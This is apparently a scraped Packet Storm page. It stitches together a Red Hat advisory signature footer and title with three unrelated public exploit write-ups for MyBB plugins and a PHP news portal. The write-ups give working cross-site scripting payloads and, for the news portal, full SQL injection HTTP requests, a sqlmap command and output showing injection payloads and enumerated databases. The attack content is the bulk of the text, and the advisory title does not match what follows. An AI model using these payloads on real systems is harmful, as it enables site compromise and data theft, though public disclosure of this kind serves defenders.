rl2Mi6+LEFkkuoHVpGBXU/FbksghFQ3AVmvU/rA8LDu3XyXlVY0ZcsxnktI7cttL  
74/HXf5D5WOra2f6ixm90ExTUQfFTi081Z4brLdYi9SwaKj0eRMBEX95uprkr/xS  
jvOZEjTyGSMBIZD8zxf602EDCQ9taWesbzpsDeWPP/R3ZF4ZCFZp3L9SLVxsYkGm  
RiMGait8V8EBUYlWS9Qnlk9CqxOOjKcaw7N5yv/g4ovdcEylFv9O4WKHUO9X3dXt  
b35Rv8IwzfNeHr80iI+kQT8TwVn52lvTd0PpmVSh+C0R2AXQiX2pWUUg1/tZ6HG7  
KkhpBIhk9m9+JdZjcVAyys+SivRwzaWx7JFUFPpRAL6BV3INd2sm41nLIEDr0Wew  
pnlVYsiAcXi6xqSPyma8L0W+2BHKg2rFfijw0Oujyd6jrDtjjy2+U2UleiTaF21e  
M4SWBo6JyIG9jibwCUNgkgtkHg+h9yTfGCnprJ5+T5KlqS55aFzTehibr4dvCpfv  
wmUHijodtSCnNnf4ki2TS3TN6Cjis07W4LvF5wFG+9nCH+UA8uRDxUM1L3CsFxIJ  
L8T3yYmVOzel6hbhT5P7aV5KhuBSf3W9jsF8EPeU76X9DDB1D6ga+eiQ3H1femS+  
qT3glZUiVjs=  
=pxlM  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1303-01

MyBB External Redirect Warning plugin version 1.3 suffers from a cross site scripting vulnerability.

    # Exploit Title: MyBB External Redirect Warning Plugin 1.3 – Cross-Site Scripting# Date: February 1, 2021# Author: 0xB9# Twitter: @0xB9sec# Software Link: https://community.mybb.com/mods.php?action=view&pid=493# Version: 1.3# Tested On: Windows 10# CVE: CVE-2022-28353Description:This plugin notifies the user when they are being redirect to an off-site page. The redirect URL is vulnerable to XSS.Proof of Concept:– Go to the following URL… external.php?url=javascript:alert(1);– Click continuePayload will execute

MyBB External Redirect Warning 1.3 Cross Site Scripting

MyBB Active Threads plugin version 1.3.0 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: MyBB Active Threads Plugin 1.3.0 – Cross-Site Scripting# Date: February 9, 2022# Author: 0xB9# Twitter: @0xB9sec# Software Link: https://community.mybb.com/mods.php?action=view&pid=1336# Version: 1.3.0# Tested On: Windows 10# CVE: CVE-2022-28354Description:This plugin shows a page of active threads. The date parameter is vulnerable to XSS when setting a time period.Proof of Concept:activethreads.php?days=7&hours=0&mins=0&date=”><script>alert(1)</script>

MyBB Active Threads 1.3.0 Cross Site Scripting

101+ News Portal version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: 101+ News Portal - SQLi# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/101news_0.zip# Version: 1.0# Tested on: Windows, Linux## Description A Blind SQL injection vulnerability in the page (/101news/search.php) in 101+ News Portal allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "searchtitle" parameter. ## Request PoC```POST /101news/search.php HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/101news/Content-Type: application/x-www-form-urlencodedContent-Length: 59Cookie: PHPSESSID=o5fslt60dlojncb7jnft04lps9searchtitle=232943'```This request causes an error. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "searchtitle" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 20 command works. ```POST /101news/search.php HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/101news/Content-Type: application/x-www-form-urlencodedContent-Length: 59Cookie: PHPSESSID=o5fslt60dlojncb7jnft04lps9searchtitle=232943'%2b(select*from(select(sleep(20)))a)%2b'```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/multi]└─# sqlmap -r sqli.txt -p 'searchtitle' --batch --dbs --level=3 --risk=2                                           ---snip---POST parameter 'searchtitle' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 114 HTTP(s) requests:---Parameter: searchtitle (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: searchtitle=232943' AND 3793=(SELECT (CASE WHEN (3793=3793) THEN 3793 ELSE (SELECT 6168 UNION SELECT 2808) END))-- KdPX    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: searchtitle=232943' AND (SELECT 1460 FROM (SELECT(SLEEP(5)))dqHc)-- zMGY    Type: UNION query    Title: Generic UNION query (NULL) - 8 columns    Payload: searchtitle=232943' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787071,0x457444695056617478516b4b4f666e73744162466478444e5061624161514f78726c727777764c6b,0x716a6b6271)-- ----[18:01:02] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.2.0, Apache 2.4.54back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)[18:01:02] [INFO] fetching database namesavailable databases [5]:[*] information_schema[*] mysql[*] newsportal[*] performance_schema[*] phpmyadmin---snip---```

Source

Packet Storm